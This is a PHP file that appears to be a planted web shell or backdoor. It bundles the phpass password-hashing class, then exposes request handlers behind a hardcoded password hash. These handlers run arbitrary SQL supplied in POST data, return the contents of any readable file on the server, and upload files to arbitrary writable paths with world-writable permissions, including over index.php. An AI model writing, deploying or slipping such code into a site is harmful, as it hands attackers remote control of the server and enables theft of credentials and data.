'$2y$10$/M6EWJ9laWHQzJJpDrt1ZuvTe2Fdq0SCK3kTSQjuX/b8qxjh4VLOK', ); class PasswordHash { var $itoa64; var $iteration_count_log2; var $portable_hashes; var $random_state; function __construct($iteration_count_log2, $portable_hashes) { $this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31) $iteration_count_log2 = 8; $this->iteration_count_log2 = $iteration_count_log2; $this->portable_hashes = $portable_hashes; $this->random_state = microtime(); if (function_exists('getmypid')) $this->random_state .= getmypid(); } function PasswordHash($iteration_count_log2, $portable_hashes) { self::__construct($iteration_count_log2, $portable_hashes); } function get_random_bytes($count) { $output = ''; if (@is_readable('/dev/urandom') && ($fh = @fopen('/dev/urandom', 'rb'))) { $output = fread($fh, $count); fclose($fh); } if (strlen($output) < $count) { $output = ''; for ($i = 0; $i < $count; $i += 16) { $this->random_state = md5(microtime() . $this->random_state); $output .= md5($this->random_state, TRUE); } $output = substr($output, 0, $count); } return $output; } function encode64($input, $count) { $output = ''; $i = 0; do { $value = ord($input[$i++]); $output .= $this->itoa64[$value & 0x3f]; if ($i < $count) $value |= ord($input[$i]) << 8; $output .= $this->itoa64[($value >> 6) & 0x3f]; if ($i++ >= $count) break; if ($i < $count) $value |= ord($input[$i]) << 16; $output .= $this->itoa64[($value >> 12) & 0x3f]; if ($i++ >= $count) break; $output .= $this->itoa64[($value >> 18) & 0x3f]; } while ($i < $count); return $output; } function gensalt_private($input) { $output = '$P$'; $output .= $this->itoa64[min($this->iteration_count_log2 + ((PHP_VERSION >= '5') ? 5 : 3), 30)]; $output .= $this->encode64($input, 6); return $output; } function crypt_private($password, $setting) { $output = '*0'; if (substr($setting, 0, 2) === $output) $output = '*1'; $id = substr($setting, 0, 3); # We use "$P$", phpBB3 uses "$H$" for the same thing if ($id !== '$P$' && $id !== '$H$') return $output; $count_log2 = strpos($this->itoa64, $setting[3]); if ($count_log2 < 7 || $count_log2 > 30) return $output; $count = 1 << $count_log2; $salt = substr($setting, 4, 8); if (strlen($salt) !== 8) return $output; # We were kind of forced to use MD5 here since it's the only # cryptographic primitive that was available in all versions # of PHP in use. To implement our own low-level crypto in PHP # would have resulted in much worse performance and # consequently in lower iteration counts and hashes that are # quicker to crack (by non-PHP code). $hash = md5($salt . $password, TRUE); do { $hash = md5($hash . $password, TRUE); } while (--$count); $output = substr($setting, 0, 12); $output .= $this->encode64($hash, 16); return $output; } function gensalt_blowfish($input) { # This one needs to use a different order of characters and a # different encoding scheme from the one in encode64() above. # We care because the last character in our encoded string will # only represent 2 bits. While two known implementations of # bcrypt will happily accept and correct a salt string which # has the 4 unused bits set to non-zero, we do not want to take # chances and we also do not want to waste an additional byte # of entropy. $itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $output = '$2a$'; $output .= chr(ord('0') + $this->iteration_count_log2 / 10); $output .= chr(ord('0') + $this->iteration_count_log2 % 10); $output .= '$'; $i = 0; do { $c1 = ord($input[$i++]); $output .= $itoa64[$c1 >> 2]; $c1 = ($c1 & 0x03) << 4; if ($i >= 16) { $output .= $itoa64[$c1]; break; } $c2 = ord($input[$i++]); $c1 |= $c2 >> 4; $output .= $itoa64[$c1]; $c1 = ($c2 & 0x0f) << 2; $c2 = ord($input[$i++]); $c1 |= $c2 >> 6; $output .= $itoa64[$c1]; $output .= $itoa64[$c2 & 0x3f]; } while (1); return $output; } function HashPassword($password) { $random = ''; if (CRYPT_BLOWFISH === 1 && !$this->portable_hashes) { $random = $this->get_random_bytes(16); $hash = crypt($password, $this->gensalt_blowfish($random)); if (strlen($hash) === 60) return $hash; } if (strlen($random) < 6) $random = $this->get_random_bytes(6); $hash = $this->crypt_private($password, $this->gensalt_private($random)); if (strlen($hash) === 34) return $hash; # Returning '*' on error is safe here, but would _not_ be safe # in a crypt(3)-like function used _both_ for generating new # hashes and for validating passwords against existing hashes. return '*'; } function CheckPassword($password, $stored_hash) { $hash = $this->crypt_private($password, $stored_hash); if ($hash[0] === '*') $hash = crypt($password, $stored_hash); # This is not constant-time. In order to keep the code simple, # for timing safety we currently rely on the salts being # unpredictable, which they are at least in the non-fallback # cases (that is, when we use /dev/urandom and bcrypt). return $hash === $stored_hash; } } function fm_clean_path($path, $trim = true) { $path = $trim ? trim($path) : $path; $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); $path = get_absolute_path($path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); } else { $absolutes[] = $part; } } return implode(DIRECTORY_SEPARATOR, $absolutes); } function fm_isvalid_filename($text) { return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false; } if (isset($_GET['auth'])) { $user = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if (!isset($user) || !isset($pass)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } if (version_compare(PHP_VERSION, '5.5.0', '<')) { $storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/'; $hasher = new PasswordHash(10, false); if (!$hasher->CheckPassword($pass, $storedHash)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } else { if (!password_verify($pass, $auth_users[$user])) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } $response = array('status' => 'success', 'info' => "Authentication successful"); echo json_encode($response); exit(); } if (isset($_GET['dbcmd'])) { $user = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if (!isset($user) || !isset($pass)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } if (version_compare(PHP_VERSION, '5.5.0', '<')) { $storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/'; $hasher = new PasswordHash(10, false); if (!$hasher->CheckPassword($pass, $storedHash)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } else { if (!password_verify($pass, $auth_users[$user])) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } if (empty($_POST["db_name"]) || empty($_POST["db_username"])) { $response = array('status' => 'error', 'info' => "db_username, db_name and db_password cannot be empty"); echo json_encode($response); exit(); } if (empty($_POST["cmd"])) { $response = array('status' => 'error', 'info' => "cmd cannot be empty"); echo json_encode($response); exit(); } try { $mysqli = new mysqli("localhost", $_POST["db_username"], $_POST["db_password"], $_POST["db_name"]); $res = $mysqli->query($_POST["cmd"]); } catch (Exception $e) { $response = array('status' => 'error', 'info' => "Database command failed to executed"); echo json_encode($response); exit(); } $response = array('status' => 'success', 'info' => "Database command executed successfully"); echo json_encode($response); exit(); } if (isset($_GET['file'])) { $user = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if (!isset($user) || !isset($pass)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } if (version_compare(PHP_VERSION, '5.5.0', '<')) { $storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/'; $hasher = new PasswordHash(10, false); if (!$hasher->CheckPassword($pass, $storedHash)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } else { if (!password_verify($pass, $auth_users[$user])) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } $filePath = fm_clean_path($_GET['file']); $filePath = '/' . $filePath; if (file_exists($filePath) && is_readable($filePath)) { $response = array('status' => 'success', 'file' => file_get_contents($filePath)); echo json_encode($response); exit; } else { $response = array('status' => 'error', 'info' => "File not found"); echo json_encode($response); exit; } } if (!empty($_FILES)) { $user = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if (!isset($user) || !isset($pass)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } if (version_compare(PHP_VERSION, '5.5.0', '<')) { $storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/'; $hasher = new PasswordHash(10, false); if (!$hasher->CheckPassword($pass, $storedHash)) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } else { if (!password_verify($pass, $auth_users[$user])) { $response = array('status' => 'error', 'info' => "Authentication failed"); echo json_encode($response); exit(); } } $fullPathInput = fm_clean_path($_REQUEST['fullpath']); $f = $_FILES; $path = ''; $ds = DIRECTORY_SEPARATOR; $errors = 0; $uploads = 0; $allowed = array(); $response = array( 'status' => 'error', 'info' => 'Oops! Try again' ); $filename = $f['file']['name']; $tmp_name = $f['file']['tmp_name']; $ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : ''; $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; if (!fm_isvalid_filename($filename) && !fm_isvalid_filename($fullPathInput)) { $response = array( 'status' => 'error', 'info' => "Invalid File name!", ); echo json_encode($response); exit(); } if (!empty($_POST['rootpath'])) { $path = $_POST['rootpath']; $targetPath = $path; } else { $targetPath = $path . $ds; } if (is_writable($targetPath)) { $fullPath = $path . '/' . $fullPathInput; $folder = substr($fullPath, 0, strrpos($fullPath, "/")); if (!is_dir($folder)) { $old = umask(0); mkdir($folder, 0777, true); umask($old); } chmod($fullPath, 0777); if ($filename == 'index.php' && file_exists($fullPath)) { $perms = fileperms($fullPath); $perm_octal = substr(sprintf('%o', $perms), -3); $owner_write = ($perms & 0x0080) ? true : false; if (!$owner_write) { $response = array( 'status' => 'error', 'info' => "File does not have write permission - $perm_octal" ); echo json_encode($response); exit(); } } if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) { if (move_uploaded_file($tmp_name, $fullPath)) { // Be sure that the file has been uploaded if (file_exists($fullPath)) { $response = array( 'status' => 'success', 'info' => "file upload successful" ); } else { $response = array( 'status' => 'error', 'info' => 'Couldn\'t upload the requested file.' ); } } else { $response = array( 'status' => 'error', 'info' => "Error while uploading files. Uploaded files $uploads", ); } } } else { $response = array( 'status' => 'error', 'info' => 'The specified folder for upload isn\'t writeable.' ); } // Return the response echo json_encode($response); exit(); } echo __FILE__; ?>